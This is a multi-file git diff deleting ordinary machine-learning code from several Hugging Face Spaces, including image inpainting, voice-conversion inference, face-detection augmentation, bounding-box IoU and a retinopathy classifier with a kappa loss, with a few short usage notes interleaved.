- normal_canvas, all_canvas = output_3d_photo(verts.copy(), colors.copy(), faces.copy(), copy.deepcopy(Height), copy.deepcopy(Width), copy.deepcopy(hFov), copy.deepcopy(vFov),
- copy.deepcopy(sample['tgt_pose']), sample['video_postfix'], copy.deepcopy(sample['ref_pose']), copy.deepcopy(config['video_folder']),
- image.copy(), copy.deepcopy(sample['int_mtx']), config, image,
- videos_poses, video_basename, config.get('original_h'), config.get('original_w'), border=border, depth=depth, normal_canvas=normal_canvas, all_canvas=all_canvas,
- mean_loc_depth=mean_loc_depth)
-
-def resizer(input_img, max_img_size=512):
- width, height = input_img.size
- long_edge = height if height >= width else width
- if long_edge > max_img_size:
- ratio = max_img_size / long_edge
- resized_width = int(ratio * width)
- resized_height = int(ratio * height)
- resized_input_img = input_img.resize((resized_width, resized_height), resample=2)
- return resized_input_img
-
- else:
- return input_img
-
-def main_app(input_img, num_frames, fps):
-
- # resize down
- input_img = resizer(input_img)
-
- # Save image in necessary folder for inpainting
- #img_name = Path(str(uuid.uuid4()) + '.jpg')
- img_name = Path('sample.jpg')
- save_folder = Path('image')
- input_img.save(save_folder/img_name)
-
- inpaint(img_name, num_frames, fps)
-
- #subprocess.run('ls -l', shell=True)
- #subprocess.run('ls image -l', shell=True)
- #subprocess.run('ls video/ -l', shell=True)
-
- # Get output video path & return
- input_img_path = str(save_folder/img_name)
- out_vid_path = 'video/{0}_zoom-in.mp4'.format(img_name.stem)
-
- return out_vid_path
-
-video_choices = ['dolly-zoom-in', 'zoom-in', 'circle', 'swing']
-gradio_inputs = [gr.Image(type='pil', label='Input Image'),
- gr.Slider(minimum=60, maximum=240, step=1, default=120, label="Number of Frames"),
- gr.Slider(minimum=10, maximum=40, step=1, default=20, label="Frames per Second (FPS)")]
-
-gradio_outputs = [gr.Video(label='Output Video')]
-examples = [ ['moon.jpg', 60, 10], ['dog.jpg', 60, 10] ]
-
-description="Convert an image into a trajectory-following video. Images are automatically resized down to a max edge of 512. | NOTE: The current runtime for a sample is around 400-700 seconds. Running on a lower number of frames could help! Do be patient as this is on CPU-only, BUT if this space maybe gets a GPU one day, it's already configured to run with GPU-support :) If you have a GPU, feel free to use the author's original repo (linked at the bottom of this path, they have a collab notebook!) You can also run this space/gradio app locally!"
-
-article = "3D Photography using Context-aware Layered Depth Inpainting | Github Project Page | Github Repo
"
-
-iface = gr.Interface(fn=main_app, inputs=gradio_inputs , outputs=gradio_outputs, examples=examples,
- title='3D Image Inpainting',
- description=description,
- article=article,
- allow_flagging='never',
- theme="default",
- cache_examples=False).launch(enable_queue=True, debug=True)
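For reference, the `resizer` helper earlier in this file scales the longer edge down to `max_img_size` (512) while keeping the aspect ratio. A quick check of that arithmetic with a synthetic PIL image (values are illustrative):

```python
from PIL import Image

img = Image.new('RGB', (2048, 1024))      # long edge is the width here
ratio = 512 / 2048                        # max_img_size / long_edge
target = (int(ratio * 2048), int(ratio * 1024))
print(target)                             # (512, 256)

resized = img.resize(target, resample=2)  # resample=2 == PIL.Image.BILINEAR, as in resizer()
print(resized.size)                       # (512, 256)
```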
diff --git a/spaces/Jamel887/Rv-percobaan887/lib/infer_pack/onnx_inference.py b/spaces/Jamel887/Rv-percobaan887/lib/infer_pack/onnx_inference.py
deleted file mode 100644
index c78324cbc08414fffcc689f325312de0e51bd6b4..0000000000000000000000000000000000000000
--- a/spaces/Jamel887/Rv-percobaan887/lib/infer_pack/onnx_inference.py
+++ /dev/null
@@ -1,143 +0,0 @@
-import onnxruntime
-import librosa
-import numpy as np
-import soundfile
-
-
-class ContentVec:
- def __init__(self, vec_path="pretrained/vec-768-layer-12.onnx", device=None):
- print("load model(s) from {}".format(vec_path))
- if device == "cpu" or device is None:
- providers = ["CPUExecutionProvider"]
- elif device == "cuda":
- providers = ["CUDAExecutionProvider", "CPUExecutionProvider"]
- elif device == "dml":
- providers = ["DmlExecutionProvider"]
- else:
- raise RuntimeError("Unsportted Device")
- self.model = onnxruntime.InferenceSession(vec_path, providers=providers)
-
- def __call__(self, wav):
- return self.forward(wav)
-
- def forward(self, wav):
- feats = wav
- if feats.ndim == 2: # double channels
- feats = feats.mean(-1)
- assert feats.ndim == 1, feats.ndim
- feats = np.expand_dims(np.expand_dims(feats, 0), 0)
- onnx_input = {self.model.get_inputs()[0].name: feats}
- logits = self.model.run(None, onnx_input)[0]
- return logits.transpose(0, 2, 1)
-
-
-def get_f0_predictor(f0_predictor, hop_length, sampling_rate, **kargs):
- if f0_predictor == "pm":
- from lib.infer_pack.modules.F0Predictor.PMF0Predictor import PMF0Predictor
-
- f0_predictor_object = PMF0Predictor(
- hop_length=hop_length, sampling_rate=sampling_rate
- )
- elif f0_predictor == "harvest":
- from lib.infer_pack.modules.F0Predictor.HarvestF0Predictor import HarvestF0Predictor
-
- f0_predictor_object = HarvestF0Predictor(
- hop_length=hop_length, sampling_rate=sampling_rate
- )
- elif f0_predictor == "dio":
- from lib.infer_pack.modules.F0Predictor.DioF0Predictor import DioF0Predictor
-
- f0_predictor_object = DioF0Predictor(
- hop_length=hop_length, sampling_rate=sampling_rate
- )
- else:
- raise Exception("Unknown f0 predictor")
- return f0_predictor_object
-
-
-class OnnxRVC:
- def __init__(
- self,
- model_path,
- sr=40000,
- hop_size=512,
- vec_path="vec-768-layer-12",
- device="cpu",
- ):
- vec_path = f"pretrained/{vec_path}.onnx"
- self.vec_model = ContentVec(vec_path, device)
- if device == "cpu" or device is None:
- providers = ["CPUExecutionProvider"]
- elif device == "cuda":
- providers = ["CUDAExecutionProvider", "CPUExecutionProvider"]
- elif device == "dml":
- providers = ["DmlExecutionProvider"]
- else:
- raise RuntimeError("Unsportted Device")
- self.model = onnxruntime.InferenceSession(model_path, providers=providers)
- self.sampling_rate = sr
- self.hop_size = hop_size
-
- def forward(self, hubert, hubert_length, pitch, pitchf, ds, rnd):
- onnx_input = {
- self.model.get_inputs()[0].name: hubert,
- self.model.get_inputs()[1].name: hubert_length,
- self.model.get_inputs()[2].name: pitch,
- self.model.get_inputs()[3].name: pitchf,
- self.model.get_inputs()[4].name: ds,
- self.model.get_inputs()[5].name: rnd,
- }
- return (self.model.run(None, onnx_input)[0] * 32767).astype(np.int16)
-
- def inference(
- self,
- raw_path,
- sid,
- f0_method="dio",
- f0_up_key=0,
- pad_time=0.5,
- cr_threshold=0.02,
- ):
- f0_min = 50
- f0_max = 1100
- f0_mel_min = 1127 * np.log(1 + f0_min / 700)
- f0_mel_max = 1127 * np.log(1 + f0_max / 700)
- f0_predictor = get_f0_predictor(
- f0_method,
- hop_length=self.hop_size,
- sampling_rate=self.sampling_rate,
- threshold=cr_threshold,
- )
- wav, sr = librosa.load(raw_path, sr=self.sampling_rate)
- org_length = len(wav)
- if org_length / sr > 50.0:
- raise RuntimeError("Reached Max Length")
-
- wav16k = librosa.resample(wav, orig_sr=self.sampling_rate, target_sr=16000)
-
- hubert = self.vec_model(wav16k)
- hubert = np.repeat(hubert, 2, axis=2).transpose(0, 2, 1).astype(np.float32)
- hubert_length = hubert.shape[1]
-
- pitchf = f0_predictor.compute_f0(wav, hubert_length)
- pitchf = pitchf * 2 ** (f0_up_key / 12)
- pitch = pitchf.copy()
- f0_mel = 1127 * np.log(1 + pitch / 700)
- f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / (
- f0_mel_max - f0_mel_min
- ) + 1
- f0_mel[f0_mel <= 1] = 1
- f0_mel[f0_mel > 255] = 255
- pitch = np.rint(f0_mel).astype(np.int64)
-
- pitchf = pitchf.reshape(1, len(pitchf)).astype(np.float32)
- pitch = pitch.reshape(1, len(pitch))
- ds = np.array([sid]).astype(np.int64)
-
- rnd = np.random.randn(1, 192, hubert_length).astype(np.float32)
- hubert_length = np.array([hubert_length]).astype(np.int64)
-
- out_wav = self.forward(hubert, hubert_length, pitch, pitchf, ds, rnd).squeeze()
- out_wav = np.pad(out_wav, (0, 2 * self.hop_size), "constant")
- return out_wav[0:org_length]
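For orientation, a minimal usage sketch of the OnnxRVC wrapper deleted above, assuming its definitions are in scope; the model and audio paths are hypothetical placeholders, and the vec-768-layer-12 ONNX export is expected under pretrained/ as the constructor requires.

import soundfile as sf  # only needed to write the result to disk

# Hypothetical paths - point these at a real RVC ONNX export and an input clip.
rvc = OnnxRVC("models/singer.onnx", sr=40000, hop_size=512,
              vec_path="vec-768-layer-12", device="cpu")
out = rvc.inference("input.wav", sid=0, f0_method="dio", f0_up_key=0)  # int16 samples
sf.write("converted.wav", out, 40000)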
diff --git a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/stylesheet/override-gradio.css b/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/stylesheet/override-gradio.css
deleted file mode 100644
index 4705139f87d3625c43bb688c9e62d200a956f57a..0000000000000000000000000000000000000000
--- a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/stylesheet/override-gradio.css
+++ /dev/null
@@ -1,67 +0,0 @@
-
-/* Fix incorrect padding when container=False */
-div.form {
- background: none !important;
-}
-div.no-container {
- padding: 10px 0 0 0 !important;
-}
-
-/* Gradio footer info */
-footer {
- /* display: none !important; */
- margin-top: .2em !important;
- font-size: 85%;
-}
-
-/* Override Gradio's ugly copy-button style */
-.message pre button[title="copy"] {
- border-radius: 5px;
- transition: background-color .2s ease;
-}
-.message pre button[title="copy"]:hover {
- background-color: #333232;
-}
-.message pre button .check {
- color: #fff !important;
- background: var(--neutral-950) !important;
-}
-
-
-
-
-/* Override Slider Styles (for webkit browsers like Safari and Chrome)
- * Really hoping this proposal lands soon: https://github.com/w3c/csswg-drafts/issues/4410
- * Range sliders are still far too inconsistent across platforms
-**/
-
-input[type="range"] {
- /* -webkit-appearance: none; */
- appearance: none;
- height: 4px;
- background: var(--input-background-fill);
- border-radius: 5px;
- background-image: linear-gradient(var(--primary-500),var(--primary-500));
- background-size: 0% 100%;
- background-repeat: no-repeat;
-}
-input[type="range"]::-webkit-slider-thumb {
- -webkit-appearance: none;
- height: 20px;
- width: 20px;
- border-radius: 50%;
- border: solid 0.5px #ddd;
- background-color: white;
- cursor: ew-resize;
- box-shadow: var(--input-shadow);
- transition: background-color .1s ease;
-}
-input[type="range"]::-webkit-slider-thumb:hover {
- background: var(--neutral-50);
-}
-input[type=range]::-webkit-slider-runnable-track {
- -webkit-appearance: none;
- box-shadow: none;
- border: none;
- background: transparent;
-}
diff --git a/spaces/KenjieDec/GPEN/retinaface/data/data_augment.py b/spaces/KenjieDec/GPEN/retinaface/data/data_augment.py
deleted file mode 100644
index c1b52ae19bf8d9ac3fa256b68730ce1b556c6d6e..0000000000000000000000000000000000000000
--- a/spaces/KenjieDec/GPEN/retinaface/data/data_augment.py
+++ /dev/null
@@ -1,237 +0,0 @@
-import cv2
-import numpy as np
-import random
-from utils.box_utils import matrix_iof
-
-
-def _crop(image, boxes, labels, landm, img_dim):
- height, width, _ = image.shape
- pad_image_flag = True
-
- for _ in range(250):
- """
- if random.uniform(0, 1) <= 0.2:
- scale = 1.0
- else:
- scale = random.uniform(0.3, 1.0)
- """
- PRE_SCALES = [0.3, 0.45, 0.6, 0.8, 1.0]
- scale = random.choice(PRE_SCALES)
- short_side = min(width, height)
- w = int(scale * short_side)
- h = w
-
- if width == w:
- l = 0
- else:
- l = random.randrange(width - w)
- if height == h:
- t = 0
- else:
- t = random.randrange(height - h)
- roi = np.array((l, t, l + w, t + h))
-
- value = matrix_iof(boxes, roi[np.newaxis])
- flag = (value >= 1)
- if not flag.any():
- continue
-
- centers = (boxes[:, :2] + boxes[:, 2:]) / 2
- mask_a = np.logical_and(roi[:2] < centers, centers < roi[2:]).all(axis=1)
- boxes_t = boxes[mask_a].copy()
- labels_t = labels[mask_a].copy()
- landms_t = landm[mask_a].copy()
- landms_t = landms_t.reshape([-1, 5, 2])
-
- if boxes_t.shape[0] == 0:
- continue
-
- image_t = image[roi[1]:roi[3], roi[0]:roi[2]]
-
- boxes_t[:, :2] = np.maximum(boxes_t[:, :2], roi[:2])
- boxes_t[:, :2] -= roi[:2]
- boxes_t[:, 2:] = np.minimum(boxes_t[:, 2:], roi[2:])
- boxes_t[:, 2:] -= roi[:2]
-
- # landm
- landms_t[:, :, :2] = landms_t[:, :, :2] - roi[:2]
- landms_t[:, :, :2] = np.maximum(landms_t[:, :, :2], np.array([0, 0]))
- landms_t[:, :, :2] = np.minimum(landms_t[:, :, :2], roi[2:] - roi[:2])
- landms_t = landms_t.reshape([-1, 10])
-
-
- # make sure that the cropped image contains at least one face > 16 pixel at training image scale
- b_w_t = (boxes_t[:, 2] - boxes_t[:, 0] + 1) / w * img_dim
- b_h_t = (boxes_t[:, 3] - boxes_t[:, 1] + 1) / h * img_dim
- mask_b = np.minimum(b_w_t, b_h_t) > 0.0
- boxes_t = boxes_t[mask_b]
- labels_t = labels_t[mask_b]
- landms_t = landms_t[mask_b]
-
- if boxes_t.shape[0] == 0:
- continue
-
- pad_image_flag = False
-
- return image_t, boxes_t, labels_t, landms_t, pad_image_flag
- return image, boxes, labels, landm, pad_image_flag
-
-
-def _distort(image):
-
- def _convert(image, alpha=1, beta=0):
- tmp = image.astype(float) * alpha + beta
- tmp[tmp < 0] = 0
- tmp[tmp > 255] = 255
- image[:] = tmp
-
- image = image.copy()
-
- if random.randrange(2):
-
- #brightness distortion
- if random.randrange(2):
- _convert(image, beta=random.uniform(-32, 32))
-
- #contrast distortion
- if random.randrange(2):
- _convert(image, alpha=random.uniform(0.5, 1.5))
-
- image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
-
- #saturation distortion
- if random.randrange(2):
- _convert(image[:, :, 1], alpha=random.uniform(0.5, 1.5))
-
- #hue distortion
- if random.randrange(2):
- tmp = image[:, :, 0].astype(int) + random.randint(-18, 18)
- tmp %= 180
- image[:, :, 0] = tmp
-
- image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
-
- else:
-
- #brightness distortion
- if random.randrange(2):
- _convert(image, beta=random.uniform(-32, 32))
-
- image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
-
- #saturation distortion
- if random.randrange(2):
- _convert(image[:, :, 1], alpha=random.uniform(0.5, 1.5))
-
- #hue distortion
- if random.randrange(2):
- tmp = image[:, :, 0].astype(int) + random.randint(-18, 18)
- tmp %= 180
- image[:, :, 0] = tmp
-
- image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
-
- #contrast distortion
- if random.randrange(2):
- _convert(image, alpha=random.uniform(0.5, 1.5))
-
- return image
-
-
-def _expand(image, boxes, fill, p):
- if random.randrange(2):
- return image, boxes
-
- height, width, depth = image.shape
-
- scale = random.uniform(1, p)
- w = int(scale * width)
- h = int(scale * height)
-
- left = random.randint(0, w - width)
- top = random.randint(0, h - height)
-
- boxes_t = boxes.copy()
- boxes_t[:, :2] += (left, top)
- boxes_t[:, 2:] += (left, top)
- expand_image = np.empty(
- (h, w, depth),
- dtype=image.dtype)
- expand_image[:, :] = fill
- expand_image[top:top + height, left:left + width] = image
- image = expand_image
-
- return image, boxes_t
-
-
-def _mirror(image, boxes, landms):
- _, width, _ = image.shape
- if random.randrange(2):
- image = image[:, ::-1]
- boxes = boxes.copy()
- boxes[:, 0::2] = width - boxes[:, 2::-2]
-
- # landm
- landms = landms.copy()
- landms = landms.reshape([-1, 5, 2])
- landms[:, :, 0] = width - landms[:, :, 0]
- tmp = landms[:, 1, :].copy()
- landms[:, 1, :] = landms[:, 0, :]
- landms[:, 0, :] = tmp
- tmp1 = landms[:, 4, :].copy()
- landms[:, 4, :] = landms[:, 3, :]
- landms[:, 3, :] = tmp1
- landms = landms.reshape([-1, 10])
-
- return image, boxes, landms
-
-
-def _pad_to_square(image, rgb_mean, pad_image_flag):
- if not pad_image_flag:
- return image
- height, width, _ = image.shape
- long_side = max(width, height)
- image_t = np.empty((long_side, long_side, 3), dtype=image.dtype)
- image_t[:, :] = rgb_mean
- image_t[0:0 + height, 0:0 + width] = image
- return image_t
-
-
-def _resize_subtract_mean(image, insize, rgb_mean):
- interp_methods = [cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_NEAREST, cv2.INTER_LANCZOS4]
- interp_method = interp_methods[random.randrange(5)]
- image = cv2.resize(image, (insize, insize), interpolation=interp_method)
- image = image.astype(np.float32)
- image -= rgb_mean
- return image.transpose(2, 0, 1)
-
-
-class preproc(object):
-
- def __init__(self, img_dim, rgb_means):
- self.img_dim = img_dim
- self.rgb_means = rgb_means
-
- def __call__(self, image, targets):
- assert targets.shape[0] > 0, "this image does not have gt"
-
- boxes = targets[:, :4].copy()
- labels = targets[:, -1].copy()
- landm = targets[:, 4:-1].copy()
-
- image_t, boxes_t, labels_t, landm_t, pad_image_flag = _crop(image, boxes, labels, landm, self.img_dim)
- image_t = _distort(image_t)
- image_t = _pad_to_square(image_t,self.rgb_means, pad_image_flag)
- image_t, boxes_t, landm_t = _mirror(image_t, boxes_t, landm_t)
- height, width, _ = image_t.shape
- image_t = _resize_subtract_mean(image_t, self.img_dim, self.rgb_means)
- boxes_t[:, 0::2] /= width
- boxes_t[:, 1::2] /= height
-
- landm_t[:, 0::2] /= width
- landm_t[:, 1::2] /= height
-
- labels_t = np.expand_dims(labels_t, 1)
- targets_t = np.hstack((boxes_t, landm_t, labels_t))
-
- return image_t, targets_t
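A rough sketch of driving the preproc pipeline deleted above, assuming its definitions (and utils.box_utils) are importable; the image path, mean values, and ground-truth numbers are illustrative assumptions only.

import cv2
import numpy as np

transform = preproc(img_dim=640, rgb_means=(104, 117, 123))  # assumed per-channel means

image = cv2.imread("face_sample.jpg")  # hypothetical uint8 training image
# One ground-truth row: x1, y1, x2, y2, five (x, y) landmarks, label.
landms = [60, 80, 120, 80, 90, 120, 70, 160, 110, 160]
targets = np.array([[50, 60, 200, 220, *landms, 1]], dtype=np.float32)

image_t, targets_t = transform(image, targets)  # CHW float image, targets scaled to [0, 1]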
diff --git a/spaces/KyanChen/RSPrompter/mmdet/evaluation/functional/bbox_overlaps.py b/spaces/KyanChen/RSPrompter/mmdet/evaluation/functional/bbox_overlaps.py
deleted file mode 100644
index 5d6eb82fcfc8d5444dd2a13b7d95b978f8206a55..0000000000000000000000000000000000000000
--- a/spaces/KyanChen/RSPrompter/mmdet/evaluation/functional/bbox_overlaps.py
+++ /dev/null
@@ -1,65 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-import numpy as np
-
-
-def bbox_overlaps(bboxes1,
- bboxes2,
- mode='iou',
- eps=1e-6,
- use_legacy_coordinate=False):
- """Calculate the ious between each bbox of bboxes1 and bboxes2.
-
- Args:
- bboxes1 (ndarray): Shape (n, 4)
- bboxes2 (ndarray): Shape (k, 4)
- mode (str): IOU (intersection over union) or IOF (intersection
- over foreground)
- use_legacy_coordinate (bool): Whether to use coordinate system in
- mmdet v1.x. which means width, height should be
-            calculated as `x2 - x1 + 1` and `y2 - y1 + 1` respectively.
- Note when function is used in `VOCDataset`, it should be
- True to align with the official implementation
- `http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCdevkit_18-May-2011.tar`
- Default: False.
-
- Returns:
- ious (ndarray): Shape (n, k)
- """
-
- assert mode in ['iou', 'iof']
- if not use_legacy_coordinate:
- extra_length = 0.
- else:
- extra_length = 1.
- bboxes1 = bboxes1.astype(np.float32)
- bboxes2 = bboxes2.astype(np.float32)
- rows = bboxes1.shape[0]
- cols = bboxes2.shape[0]
- ious = np.zeros((rows, cols), dtype=np.float32)
- if rows * cols == 0:
- return ious
- exchange = False
- if bboxes1.shape[0] > bboxes2.shape[0]:
- bboxes1, bboxes2 = bboxes2, bboxes1
- ious = np.zeros((cols, rows), dtype=np.float32)
- exchange = True
- area1 = (bboxes1[:, 2] - bboxes1[:, 0] + extra_length) * (
- bboxes1[:, 3] - bboxes1[:, 1] + extra_length)
- area2 = (bboxes2[:, 2] - bboxes2[:, 0] + extra_length) * (
- bboxes2[:, 3] - bboxes2[:, 1] + extra_length)
- for i in range(bboxes1.shape[0]):
- x_start = np.maximum(bboxes1[i, 0], bboxes2[:, 0])
- y_start = np.maximum(bboxes1[i, 1], bboxes2[:, 1])
- x_end = np.minimum(bboxes1[i, 2], bboxes2[:, 2])
- y_end = np.minimum(bboxes1[i, 3], bboxes2[:, 3])
- overlap = np.maximum(x_end - x_start + extra_length, 0) * np.maximum(
- y_end - y_start + extra_length, 0)
- if mode == 'iou':
- union = area1[i] + area2 - overlap
- else:
- union = area1[i] if not exchange else area2
- union = np.maximum(union, eps)
- ious[i, :] = overlap / union
- if exchange:
- ious = ious.T
- return ious
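A small self-contained check of the bbox_overlaps helper deleted above (box coordinates invented for illustration):

import numpy as np

boxes_a = np.array([[0, 0, 10, 10], [5, 5, 15, 15]], dtype=np.float32)
boxes_b = np.array([[0, 0, 10, 10]], dtype=np.float32)

ious = bbox_overlaps(boxes_a, boxes_b, mode='iou')
# ious[0, 0] == 1.0 (identical boxes); ious[1, 0] == 25 / 175 ≈ 0.143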
diff --git a/spaces/LawalAfeez/science-lab/embed.py b/spaces/LawalAfeez/science-lab/embed.py
deleted file mode 100644
index 29e975a0fab1fd2fd4ccd71aec4b9da6949b92e5..0000000000000000000000000000000000000000
--- a/spaces/LawalAfeez/science-lab/embed.py
+++ /dev/null
@@ -1,28 +0,0 @@
-from transformers import AutoTokenizer,TFAutoModel
-import torch
-from torch import nn
-import tensorflow
-
-
-
-model_ckpt = "sentence-transformers/multi-qa-mpnet-base-dot-v1"
-
-tokenizer=AutoTokenizer.from_pretrained(model_ckpt)
-
-model=TFAutoModel.from_pretrained(model_ckpt,from_pt=True)
-
-
-def cls_pool(model):
-
- return model.last_hidden_state[:,0,:]
-
-def sample_embedding(example):
-
- token_output=tokenizer(example,padding=True,truncation=True,return_tensors="tf")
-
- token_output={k:v for k,v in token_output.items()}
-
-
- model_output=model(**token_output)
-
- return {"embedding":cls_pool(model_output).numpy()[0]}
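For reference, a minimal call of the sample_embedding helper deleted above; the sentence is arbitrary, and the 768-dimensional output assumes the mpnet-base checkpoint loaded at module level.

sentence = "What is the boiling point of water at sea level?"
result = sample_embedding(sentence)
print(result["embedding"].shape)  # (768,) for multi-qa-mpnet-base-dot-v1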
diff --git a/spaces/Lianjd/stock_dashboard/backtrader/signals/__init__.py b/spaces/Lianjd/stock_dashboard/backtrader/signals/__init__.py
deleted file mode 100644
index b1cbbecadaec824d20e68d0fe1ea083531102701..0000000000000000000000000000000000000000
--- a/spaces/Lianjd/stock_dashboard/backtrader/signals/__init__.py
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8; py-indent-offset:4 -*-
-###############################################################################
-#
-# Copyright (C) 2015-2020 Daniel Rodriguez
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see <http://www.gnu.org/licenses/>.
-#
-###############################################################################
-from __future__ import (absolute_import, division, print_function,
- unicode_literals)
-
diff --git a/spaces/MBA98/DiabeticRetinopathyDetection/app.py b/spaces/MBA98/DiabeticRetinopathyDetection/app.py
deleted file mode 100644
index 6d75d9ed7198ef111deeeb17a9c060206fc96384..0000000000000000000000000000000000000000
--- a/spaces/MBA98/DiabeticRetinopathyDetection/app.py
+++ /dev/null
@@ -1,733 +0,0 @@
-import gradio as gr
-import cv2
-import numpy as np
-import tensorflow as tf
-import tensorflow_addons as tfa
-
-# Imported
-# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-# ==============================================================================
-"""Implements Weighted kappa loss."""
-
-from typing import Optional
-
-import tensorflow as tf
-from typeguard import typechecked
-
-from tensorflow_addons.utils.types import Number
-
-
-@tf.keras.utils.register_keras_serializable(package="Addons")
-class WeightedKappaLoss(tf.keras.losses.Loss):
- r"""Implements the Weighted Kappa loss function.
-
- Weighted Kappa loss was introduced in the
- [Weighted kappa loss function for multi-class classification
- of ordinal data in deep learning]
- (https://www.sciencedirect.com/science/article/abs/pii/S0167865517301666).
- Weighted Kappa is widely used in Ordinal Classification Problems.
-    The loss value lies in $ [-\infty, \log 2] $, where $ \log 2 $
-    corresponds to random prediction.
-
- Usage:
-
- >>> kappa_loss = tfa.losses.WeightedKappaLoss(num_classes=4)
- >>> y_true = tf.constant([[0, 0, 1, 0], [0, 1, 0, 0],
- ... [1, 0, 0, 0], [0, 0, 0, 1]])
- >>> y_pred = tf.constant([[0.1, 0.2, 0.6, 0.1], [0.1, 0.5, 0.3, 0.1],
- ... [0.8, 0.05, 0.05, 0.1], [0.01, 0.09, 0.1, 0.8]])
- >>> loss = kappa_loss(y_true, y_pred)
- >>> loss
-
-
- Usage with `tf.keras` API:
-
- >>> model = tf.keras.Model()
- >>> model.compile('sgd', loss=tfa.losses.WeightedKappaLoss(num_classes=4))
-
- <... outputs should be softmax results
- if you want to weight the samples, just multiply the outputs
- by the sample weight ...>
-
- """
-
- @typechecked
- def __init__(
- self,
- num_classes: int,
- weightage: Optional[str] = "quadratic",
- name: Optional[str] = "cohen_kappa_loss",
- epsilon: Optional[Number] = 1e-6,
- reduction: str = tf.keras.losses.Reduction.NONE,
- ):
- r"""Creates a `WeightedKappaLoss` instance.
-
- Args:
- num_classes: Number of unique classes in your dataset.
- weightage: (Optional) Weighting to be considered for calculating
- kappa statistics. A valid value is one of
- ['linear', 'quadratic']. Defaults to 'quadratic'.
- name: (Optional) String name of the metric instance.
- epsilon: (Optional) increment to avoid log zero,
- so the loss will be $ \log(1 - k + \epsilon) $, where $ k $ lies
- in $ [-1, 1] $. Defaults to 1e-6.
- Raises:
- ValueError: If the value passed for `weightage` is invalid
- i.e. not any one of ['linear', 'quadratic']
- """
-
- super().__init__(name=name, reduction=reduction)
-
- if weightage not in ("linear", "quadratic"):
- raise ValueError("Unknown kappa weighting type.")
-
- self.weightage = weightage
- self.num_classes = num_classes
- self.epsilon = epsilon or tf.keras.backend.epsilon()
- label_vec = tf.range(num_classes, dtype=tf.keras.backend.floatx())
- self.row_label_vec = tf.reshape(label_vec, [1, num_classes])
- self.col_label_vec = tf.reshape(label_vec, [num_classes, 1])
- col_mat = tf.tile(self.col_label_vec, [1, num_classes])
- row_mat = tf.tile(self.row_label_vec, [num_classes, 1])
- if weightage == "linear":
- self.weight_mat = tf.abs(col_mat - row_mat)
- else:
- self.weight_mat = (col_mat - row_mat) ** 2
-
- def call(self, y_true, y_pred):
- y_true = tf.cast(y_true, dtype=self.col_label_vec.dtype)
- y_pred = tf.cast(y_pred, dtype=self.weight_mat.dtype)
- batch_size = tf.shape(y_true)[0]
- cat_labels = tf.matmul(y_true, self.col_label_vec)
- cat_label_mat = tf.tile(cat_labels, [1, self.num_classes])
- row_label_mat = tf.tile(self.row_label_vec, [batch_size, 1])
- if self.weightage == "linear":
- weight = tf.abs(cat_label_mat - row_label_mat)
- else:
- weight = (cat_label_mat - row_label_mat) ** 2
- numerator = tf.reduce_sum(weight * y_pred)
- label_dist = tf.reduce_sum(y_true, axis=0, keepdims=True)
- pred_dist = tf.reduce_sum(y_pred, axis=0, keepdims=True)
- w_pred_dist = tf.matmul(self.weight_mat, pred_dist, transpose_b=True)
- denominator = tf.reduce_sum(tf.matmul(label_dist, w_pred_dist))
- denominator /= tf.cast(batch_size, dtype=denominator.dtype)
- loss = tf.math.divide_no_nan(numerator, denominator)
- return tf.math.log(loss + self.epsilon)
-
- def get_config(self):
- config = {
- "num_classes": self.num_classes,
- "weightage": self.weightage,
- "epsilon": self.epsilon,
- }
- base_config = super().get_config()
- return {**base_config, **config}
-
-
-# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-# ==============================================================================
-"""Implements Cohen's Kappa."""
-
-import tensorflow as tf
-import numpy as np
-import tensorflow.keras.backend as K
-from tensorflow.keras.metrics import Metric
-from typing import Union
-FloatTensorLike = Union[tf.Tensor, float, np.float16, np.float32, np.float64]
-AcceptableDTypes = Union[tf.DType, np.dtype, type, int, str, None]
-
-from typeguard import typechecked
-from typing import Optional
-
-
-@tf.keras.utils.register_keras_serializable(package="Addons")
-class CohenKappa(Metric):
- """Computes Kappa score between two raters.
-
- The score lies in the range `[-1, 1]`. A score of -1 represents
- complete disagreement between two raters whereas a score of 1
- represents complete agreement between the two raters.
- A score of 0 means agreement by chance.
-
- Note: As of now, this implementation considers all labels
- while calculating the Cohen's Kappa score.
-
- Args:
- num_classes: Number of unique classes in your dataset.
- weightage: (optional) Weighting to be considered for calculating
- kappa statistics. A valid value is one of
- [None, 'linear', 'quadratic']. Defaults to `None`
- sparse_labels: (bool) Valid only for multi-class scenario.
- If True, ground truth labels are expected to be integers
- and not one-hot encoded.
